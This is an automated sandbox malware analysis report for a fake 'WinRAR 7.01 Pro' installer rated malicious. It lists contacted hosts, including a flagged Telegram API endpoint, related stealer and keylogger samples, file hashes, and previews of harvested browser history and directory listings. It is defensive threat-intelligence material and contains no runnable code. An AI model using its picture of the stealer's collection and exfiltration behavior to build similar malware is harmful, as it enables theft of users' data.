https://aka.ms/Vh5j3kI	winrar_x64_701ar.exe, 00000001.00000003.2388750419.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2532236654.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2557756469.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247129053.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2389356453.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247591489.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2556818350.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org	tmp22D7.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	History.txt.3.dr, tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	History.txt.3.dr, tmp21A7.tmp.dat.3.dr, tmp2197.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmp2175.tmp.dat.3.dr, tmp21B8.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	tmp22D7.tmp.dat.3.dr	false	URL Reputation: safe	unknown
https://aka.ms/odirm	winrar_x64_701ar.exe, 00000001.00000003.2388750419.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2532236654.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2557756469.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247129053.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2389356453.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2247591489.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000003.2556818350.000002628B70F000.00000004.00000020.00020000.00000000.sdmp, winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.44.66	api.mylnikov.org	United States	13335	CLOUDFLARENETUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
104.16.185.241	icanhazip.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1492461
Start date and time:	2024-08-13 21:47:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 49s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	WinRAR 7.01 Pro.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@21/94@4/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 59 Number of non-executed functions: 86
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target WinRAR 7.01 Pro.exe, PID 7492 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: WinRAR 7.01 Pro.exe

Simulations

Behavior and APIs

Time	Type	Description
15:48:53	API Interceptor	298874x Sleep call for process: _microsoft_corporation.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.44.66	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Get hash	malicious	AsyncRAT, DcRat, StormKitty, VenomRAT	Browse
	t3h7DNer1Q.exe	Get hash	malicious	AsyncRAT, DcRat	Browse
	vp2Gd0kDCt.exe	Get hash	malicious	AsyncRAT, EICAR, RedLine, StormKitty, VenomRAT	Browse
	a.cmd	Get hash	malicious	Unknown	Browse
	UMJLhijN4z.exe	Get hash	malicious	AsyncRAT, Prynt Stealer, StormKitty, WorldWind Stealer	Browse
149.154.167.220	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	formu.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	56500104990.exe	Get hash	malicious	Snake Keylogger	Browse
	Deposit Slip 20240806.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Document.exe	Get hash	malicious	VIP Keylogger	Browse
	OMSG2024080890D-KHOJALY-LANSHAN.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	ORDER 0475.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	PO SSCJ-2406002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Quotation No.VFLOIPS31052024-1_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
104.16.185.241	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	icanhazip.com/
	eEo6DAcnnx.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	down.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	icanhazip.com/
	7Y18r(198).exe	Get hash	malicious	Upatre	Browse	icanhazip.com/
	LisectAVT_2403002B_340.exe	Get hash	malicious	Bdaejec, Upatre	Browse	icanhazip.com/
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	icanhazip.com/
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	icanhazip.com/
	7Y18r(114).exe	Get hash	malicious	Unknown	Browse	icanhazip.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.mylnikov.org	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	104.21.44.66
	eEo6DAcnnx.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	83MZfLKh7D.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine	Browse	104.21.44.66
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	2U1S7Ab7YU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	172.67.196.114
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	172.67.196.114
	Kh7W85ONS7.exe	Get hash	malicious	AsyncRAT, DarkTortilla, StormKitty, WorldWind Stealer	Browse	104.21.44.66
	zrrHgsDzgS.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT	Browse	104.21.44.66
	H1XdsfkcgU.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.21.44.66
api.telegram.org	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	formu.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	56500104990.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Deposit Slip 20240806.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Document.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	OMSG2024080890D-KHOJALY-LANSHAN.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ORDER 0475.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO SSCJ-2406002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation No.VFLOIPS31052024-1_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
icanhazip.com	PasteHook.exe	Get hash	malicious	AsyncRAT, DCRat, StormKitty, WorldWind Stealer, Xmrig	Browse	104.16.185.241
	eEo6DAcnnx.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	83MZfLKh7D.exe	Get hash	malicious	AsyncRAT, Discord Token Stealer, Luca Stealer, MicroClip, RedLine	Browse	104.16.184.241
	5oci4lcontract.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	Inquiry.vbs	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.184.241
	viVOqZjAT0.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	104.16.185.241
	down.exe	Get hash	malicious	PXRECVOWEIWOEI Stealer	Browse	104.16.185.241
	7Y18r(198).exe	Get hash	malicious	Upatre	Browse	104.16.185.241
	LisectAVT_2403002B_340.exe	Get hash	malicious	Bdaejec, Upatre	Browse	104.16.185.241
	LisectAVT_2403002B_4.exe	Get hash	malicious	AsyncRAT, Neshta, StormKitty, WorldWind Stealer	Browse	104.16.185.241

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	formu.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SecuriteInfo.com.PDF.Phishing.7B6B.tr.8047.20915.xlsx	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	56500104990.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	Deposit Slip 20240806.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Document.exe	Get hash	malicious	VIP Keylogger	Browse	149.154.167.220
	OMSG2024080890D-KHOJALY-LANSHAN.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	ORDER 0475.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO SSCJ-2406002.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quotation No.VFLOIPS31052024-1_PDF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	https://www.regionvictoriaville.com/page/?ContentID=1257	Get hash	malicious	Unknown	Browse	104.18.0.16
	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	https://t.co/Y17IUmKzLP&c=E,1,rN9D8kDrUrBrFtQ3pz430P3IvJQs_POn2q4ijJOHyc835Jmr3S-o01lUVXZ5cvoOfcOdGZN-yp3O-JcUg0G4MtYkdN9rotmh1Tkon6mUrCEHmjgm-PDFw3ee&typo=1	Get hash	malicious	Unknown	Browse	104.16.225.240
	http://cdnpixelnetworks.net	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://www.ms4x.net	Get hash	malicious	Unknown	Browse	162.159.135.232
	https://reviewm4law.rpabox.cloud/	Get hash	malicious	HTMLPhisher	Browse	104.18.16.168
	formu.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TETA KAZAN REVISED OFFERS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://marvin-occentus.net/statistic	Get hash	malicious	Unknown	Browse	104.22.2.142
	Reimbursement.pdf	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	188.114.96.3
CLOUDFLARENETUS	https://www.regionvictoriaville.com/page/?ContentID=1257	Get hash	malicious	Unknown	Browse	104.18.0.16
	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	https://t.co/Y17IUmKzLP&c=E,1,rN9D8kDrUrBrFtQ3pz430P3IvJQs_POn2q4ijJOHyc835Jmr3S-o01lUVXZ5cvoOfcOdGZN-yp3O-JcUg0G4MtYkdN9rotmh1Tkon6mUrCEHmjgm-PDFw3ee&typo=1	Get hash	malicious	Unknown	Browse	104.16.225.240
	http://cdnpixelnetworks.net	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://www.ms4x.net	Get hash	malicious	Unknown	Browse	162.159.135.232
	https://reviewm4law.rpabox.cloud/	Get hash	malicious	HTMLPhisher	Browse	104.18.16.168
	formu.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	TETA KAZAN REVISED OFFERS.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	http://marvin-occentus.net/statistic	Get hash	malicious	Unknown	Browse	104.22.2.142
	Reimbursement.pdf	Get hash	malicious	HTMLPhisher, Tycoon2FA	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	New Order.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.44.66 149.154.167.220
	https://t.co/Y17IUmKzLP&c=E,1,rN9D8kDrUrBrFtQ3pz430P3IvJQs_POn2q4ijJOHyc835Jmr3S-o01lUVXZ5cvoOfcOdGZN-yp3O-JcUg0G4MtYkdN9rotmh1Tkon6mUrCEHmjgm-PDFw3ee&typo=1	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	formu.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.44.66 149.154.167.220
	TETA KAZAN REVISED OFFERS.exe	Get hash	malicious	AgentTesla	Browse	104.21.44.66 149.154.167.220
	Firstontario Caller VM_00_94 Seconds REF#e764f827cc206df3733c6c719eb86bc36b5f54d1 7_9_2024	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	https://clicks.aweber.com/y/ct/?l=VYSw&m=gN6rWonkUwz1e3P&b=ts_kMXzkVy8._uTi9_tW3A#MYmFycnkuZG9hbkBmaXJzdG9udGFyaW9jdS5jb20=	Get hash	malicious	HTMLPhisher	Browse	104.21.44.66 149.154.167.220
	http://cert-authshare.continentalcs.info/?PDuS=90	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	https://shared.outlook.inky.com	Get hash	malicious	Unknown	Browse	104.21.44.66 149.154.167.220
	trucking instructions.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	104.21.44.66 149.154.167.220
	https://pbmsfactiprojconsult.switzerlandnorth.cloudapp.azure.com/?rpu=800220101041&serie=WF&folio=000011619963&hash=186730d692393fb939f986343589efe9&ta=1&idC=999972517&idA=103902931	Get hash	malicious	HTMLPhisher	Browse	104.21.44.66 149.154.167.220

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	modified
Size (bytes):	162325
Entropy (8bit):	7.957719950382636
Encrypted:	false
SSDEEP:	3072:/JTSo6agYLXaUC+UkDolZUBK8PzCUrNB/CBC1xDTCjLCIH20BI8N/cHDd3TLxRjN:/J+o6VYLKUCBkDqZUB7CUPakbPCjLClt
MD5:	786765617208B8DFDF8FAAD9A03589CD
SHA1:	6FCA679C48A796036CF9851E89471C632D2D1B50
SHA-256:	0C7E58043B23DF4C5F387E2469CC8248AFAEED420FCB9DF75FAC9DD6BB320E81
SHA-512:	7F8F11006B7B1510EB8082532911AB226702C23DF37199EA9FBC0B4A536F5E074E7E7213C8868623C295D78E0E7710B12CD80B889504DAB8C080CE64D33A4E43
Malicious:	false
Reputation:	low
Preview:	PK........x..Y................Browsers\Edge\PK.........~.YQ3..J...i.......Browsers\Firefox\Bookmarks.txtSVVVpO-Q.H.)PPVV..b.......T........H.g^Y~NYj.\.1)..D!..YUIf^.BpIbQ.T!.PK.........~.Yc.e.S...^.......Browsers\Firefox\History.txtSVVVp.,JM.P.(.,KL.T../.LNUx.0E.7.*3''QA..L#.....J_...\/.".._........_....1M_S....PK.........~.Y..[.s...q.......Browsers\Google\History.txt..j.0...{.C.l.5..?(..9.m......&?..C.....l=..6.^..H.'K.e......V..R.\O...\|_....}..<.....2%......+$s...q.2.F..W....z.F...97.....S9..@.j.Jn.+7$....%!.q.C..+ .O...N.\-.zZ.W.....2../w.!..N...d.dj$..L..H...dJ.OI.K6E/9..\|.4i..A.y..)....9.)8P...5..O...J.M\gs.g>q......e....B..#....r...@.l.C ..(.....>K.wB........a.G..B.....Y.O..g....Z6..b......P....0.0...a_..PK.........~.Y.5^.....:.......Directories\Desktop.txte..N.0...c.;..4.....R:...J......q\..zG..t.sr...si{>}........R.J..H...,Q.Xe...}NO..r!=...h..!...Bj.....W.%..........$.rh..I-U/.h.!.....yP.../..)^&....l......Yik.(I.f~a+#.il.E!..9..........

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Browsers\Firefox\Bookmarks.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	105
Entropy (8bit):	3.8863455911790052
Encrypted:	false
SSDEEP:	3:RGtjybXLGSWK+ZjMGvRS3ZMz9GSOLj2SjyRE2qJ:hvWF7Ipg9OL2RE2m
MD5:	2E9D094DDA5CDC3CE6519F75943A4FF4
SHA1:	5D989B4AC8B699781681FE75ED9EF98191A5096C
SHA-256:	C84C98BBF5E0EF9C8D0708B5D60C5BB656B7D6BE5135D7F7A8D25557E08CF142
SHA-512:	D1F7EED00959E902BDB2125B91721460D3FF99F3BDFC1F2A343D4F58E8D4E5E5A06C0C6CDC0379211C94510F7C00D7A8B34FA7D0CA0C3D54CBBE878F1E9812B7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	### Get Help ###.### Customize Firefox ###.### Get Involved ###.### About Us ###.### Getting Started ###.

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Browsers\Firefox\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.886397362842801
Encrypted:	false
SSDEEP:	3:RGEnGPHA9lfMJJEFAN2DSLvIJiMhKVX3L2WdXuvn:DG/CF0EFAN2OLciA8d+v
MD5:	61CDD7492189720D58F6C5C975D6DFBD
SHA1:	6966AFE0DEC5B0ABD90291FA12C0F6B7EF73ED43
SHA-256:	2F345865397FF1952921DB0588A6B589BAF30E67A90E11F7064E515AC162E862
SHA-512:	20D5A1C9809DF4F5B9C789042E5B88928A5246F9EB44F9D265CA3AA6FC9544A582B758ECAF6BBB0E9CEE149BD0AAC5E6C63D954541D1B23A7FC11894121CC0AE
Malicious:	false
Preview:	### Firefox Privacy Notice . Mozilla ### (https://www.mozilla.org/en-US/privacy/firefox/) 1.

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Browsers\Google\History.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1393
Entropy (8bit):	5.241470443395582
Encrypted:	false
SSDEEP:	24:PTIOm5oh9wxOm5pjRmZDKJfOm5pjRSpDKJfOmcTdmcOWz5oPpMcOWz5pjRVpbccU:PbmAwgm/VcDKJmm/VuDKJmmcBYpB/VVe
MD5:	7F24357FFA354F2471DED45552B897D7
SHA1:	1DC89FD89BA23EA0186D0D8559B27CF647ECF4DC
SHA-256:	573E409CB5579533BC387F3943FFFACAF7694269A38B4B56987E8A8B83CF3AD1
SHA-512:	202F2FC022B7C484E0EDCA890300C471CA3097217A20BF0DDC4E1DC277D411CA3742608302DDB2A0F4E6EAA662D1B741AC2F6A4566C3133A151D0EF83EEDB6A3
Malicious:	false
Preview:	### https://go.microsoft.com/fwlink/?linkid=851546 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016 ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 3.### https://support.microsoft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us ### (Examples of Office product keys - Microsoft Support) 1.### https://go.microsoft.com/fwlink/?LinkId=2106243 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17 ### (Install the English Language Pack for 32-bit Office - Microsoft Support) 3.### https://support.microsoft.com/

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Desktop.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	570
Entropy (8bit):	5.2399925009866575
Encrypted:	false
SSDEEP:	12:wvShNN0OLxyZDysNLN4/nNNu/lJOLXvna6y72vW8LKP4PXsgFzLXjo4LaGDysjUW:VNqkxCD/oO/lJkXyyAP4PXVFnXjpaGDb
MD5:	49824B8B4E7C09A418615CEB57A23F62
SHA1:	D126761842542E010B45EBEE6F04995BE6E6AEC2
SHA-256:	39F45D15086E1C25E159D3C1E8AAC1144C4A87F2832B73484B8310A4DDE998ED
SHA-512:	1D271933FB0CBFE8858857157DD0834D52DD6594045AF84C9B6FA4ED2237B9806724862B94950A5FF623918D034644DE90323DAE2B5D7BAC5B8FFBC6E1A6080B
Malicious:	false
Preview:	Desktop\...DVWHKMNFNN\....DVWHKMNFNN.docx....KZWFNRXYKI.mp3....LTKMYBSEYZ.xlsx....NWTVCDUMOB.pdf....WUTJSCBCFX.jpg....YPSIACHYXW.png...JSDNGYCOWY\...LTKMYBSEYZ\....BPMLNOBVSB.png....FENIVHOIKN.mp3....KZWFNRXYKI.pdf....LTKMYBSEYZ.docx....WUTJSCBCFX.xlsx....ZBEDCJPBEY.jpg...VAMYDFPUND\...WKXEWIOTXI\...ZBEDCJPBEY\...BPMLNOBVSB.png...desktop.ini...DVWHKMNFNN.docx...Excel.lnk...FENIVHOIKN.mp3...KZWFNRXYKI.mp3...KZWFNRXYKI.pdf...LTKMYBSEYZ.docx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.pdf...WinRAR 7.01 Pro.exe...WUTJSCBCFX.jpg...WUTJSCBCFX.xlsx...YPSIACHYXW.png...ZBEDCJPBEY.jpg..

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Documents.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	690
Entropy (8bit):	5.317483724691566
Encrypted:	false
SSDEEP:	12:xhNN0OLxyZDysNLN4/nNNu/lJOLXvnwFPLKQ4wRLKTLKBLKMkLKq6y72vW8LKPLK:nNqkxCD/oO/lJkXIYxrqEEqyAPcFnXjl
MD5:	0F23BB782A132F1B673F31951668D642
SHA1:	34B2E3D87B78CB0C4CC833C8887973EC0EA8227F
SHA-256:	805ADDDED683B72E58E047C021037DB64FD27C21BD925E4819D7D7A187E80703
SHA-512:	94579DCFDC0507F280B9D0A86E73F5023082381E5C45E04A0E33E84B6F3FA1D2597D11222E7F0004CF61E736D8F8299686DDCDF5244261E864A58DA2799E94A8
Malicious:	false
Preview:	Documents\...DVWHKMNFNN\....DVWHKMNFNN.docx....KZWFNRXYKI.mp3....LTKMYBSEYZ.xlsx....NWTVCDUMOB.pdf....WUTJSCBCFX.jpg....YPSIACHYXW.png...JSDNGYCOWY\...LTKMYBSEYZ\....BPMLNOBVSB.png....FENIVHOIKN.mp3....KZWFNRXYKI.pdf....LTKMYBSEYZ.docx....WUTJSCBCFX.xlsx....ZBEDCJPBEY.jpg...My Music\....desktop.ini...My Pictures\....Camera Roll\.....desktop.ini....Saved Pictures\.....desktop.ini....desktop.ini...My Videos\....desktop.ini...VAMYDFPUND\...WKXEWIOTXI\...ZBEDCJPBEY\...BPMLNOBVSB.png...desktop.ini...DVWHKMNFNN.docx...FENIVHOIKN.mp3...KZWFNRXYKI.mp3...KZWFNRXYKI.pdf...LTKMYBSEYZ.docx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.pdf...WUTJSCBCFX.jpg...WUTJSCBCFX.xlsx...YPSIACHYXW.png...ZBEDCJPBEY.jpg..

C:\Users\user\AppData\Local\4a3035c4cb9343f74ca34670ddce645d\user@528110_en-CH\Directories\Downloads.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	234
Entropy (8bit):	5.239944244201294
Encrypted:	false
SSDEEP:	6:3tcKP8LKIy/jPoPd0OLXjohOLaGDysNumy8xukSQNVk4hv:aW8LKPLgFzLXjo4LaGDysHxZD
MD5:	010591172DCC0841FC57D23250751DE4
SHA1:	10C8DFC913782FC436E1C5891A09F222C5F6E2AF
SHA-256:	01C2D9DCE0665D79D1804169E3DD9CC36EDEDE6831C66A4D597AFE9C33354F1B
SHA-512:	B0836EA4887A6BD10DF011C0C6366FB35E67EF47325DDF54F297EE228644D25BC2ADE6C3984964EC9D38EBFAE204DF120FD770CE4C1D1EC13353A0537924A7E6
Malicious:	false
